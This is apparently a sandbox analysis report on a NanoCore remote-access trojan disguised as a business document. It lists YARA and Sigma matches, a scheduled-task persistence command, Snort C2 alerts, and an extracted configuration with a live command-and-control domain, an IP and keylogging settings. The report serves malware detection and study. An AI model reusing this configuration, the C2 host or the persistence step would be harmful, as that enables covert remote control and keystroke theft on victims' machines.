0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x28269:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x28296:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x28269:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x29344:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x28283:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3daff4c.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.3dab116.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d09f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0cc:$x2: IClientNetworkHost
14.2.dhcpmon.exe.3dab116.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d09f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e17a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0b9:$s5: IClientLoggingHost
14.2.dhcpmon.exe.3dab116.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.2.dhcpmon.exe.3dab116.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d055:$a: NanoCore 0x2d06a:$a: NanoCore 0x2d09f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce11:$b: ClientPlugin 0x2ce2c:$b: ClientPlugin
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2205:$a: NanoCore 0x227f:$a: NanoCore 0x6e1c:$a: NanoCore 0x81d6:$a: NanoCore 0x8220:$a: NanoCore 0x8e7a:$a: NanoCore 0x11c42:$a: NanoCore 0x11d2c:$a: NanoCore 0x12ba3:$a: NanoCore 0x1bd4d:$a: NanoCore 0x1bdae:$a: NanoCore 0x1bdf1:$a: NanoCore 0x1be31:$a: NanoCore 0x1c06d:$a: NanoCore 0x1c10d:$a: NanoCore 0x1c8e5:$a: NanoCore 0x1ced8:$a: NanoCore 0x1d029:$a: NanoCore 0x1de83:$a: NanoCore 0x1e0ea:$a: NanoCore 0x1e0ff:$a: NanoCore
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0x7c31:$a: NanoCore 0x7cab:$a: NanoCore 0xc848:$a: NanoCore 0xdc02:$a: NanoCore 0xdc4c:$a: NanoCore 0xe8a6:$a: NanoCore 0x1766e:$a: NanoCore 0x17758:$a: NanoCore 0x185cf:$a: NanoCore 0x21779:$a: NanoCore 0x217da:$a: NanoCore
7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
Click to see the 39 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe, ProcessId: 5980, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe' , ParentImage: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe, ParentProcessId: 7052, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sjZXfoyePbSa' /XML 'C:\Users\user\AppData\Local\Temp\tmp66DE.tmp', ProcessId: 64

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-00", "Group": "worker", "Domain1": "", "Domain2": "hailongfvt.zapto.org", "Port": 3365, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\sjZXfoyePbSa.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Joe Sandbox ML: detected

Source: 14.2.dhcpmon.exe.400000.0.unpack

Avira: Label: TR/Dropper.MSIL.Gen7

Compliance:

Uses 32bit PE files

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49737 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49739 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49742 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49743 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49745 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49747 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49748 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49757 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49766 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49767 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49768 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49769 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49770 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49773 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49774 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49775 -> 185.140.53.139:3365
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49776 -> 185.140.53.139:3365

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: hailongfvt.zapto.org

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 185.140.53.139:3365

Source: Joe Sandbox View

IP Address: 185.140.53.139 185.140.53.139

Source: Joe Sandbox View

ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG

Source: unknown

DNS traffic detected: queries for: hailongfvt.zapto.org

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652015213.0000000005E2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comm
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677423373.0000000005DF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comoH
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.648445406.0000000005E0B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.comic
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnG
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.650357997.0000000005DF6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnM
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.649882095.0000000005DFD000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnr
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.652891462.0000000005E2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp, COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000003.647611607.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coma
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.677517762.0000000005EE0000.00000002.00000001.sdmp, dhcpmon.exe, 00000008.00000002.730501182.00000000060C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp, dhcpmon.exe, 00000008.00000002.724064551.0000000002F28000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: dhcpmon.exe, 00000008.00000002.721479740.00000000012A8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
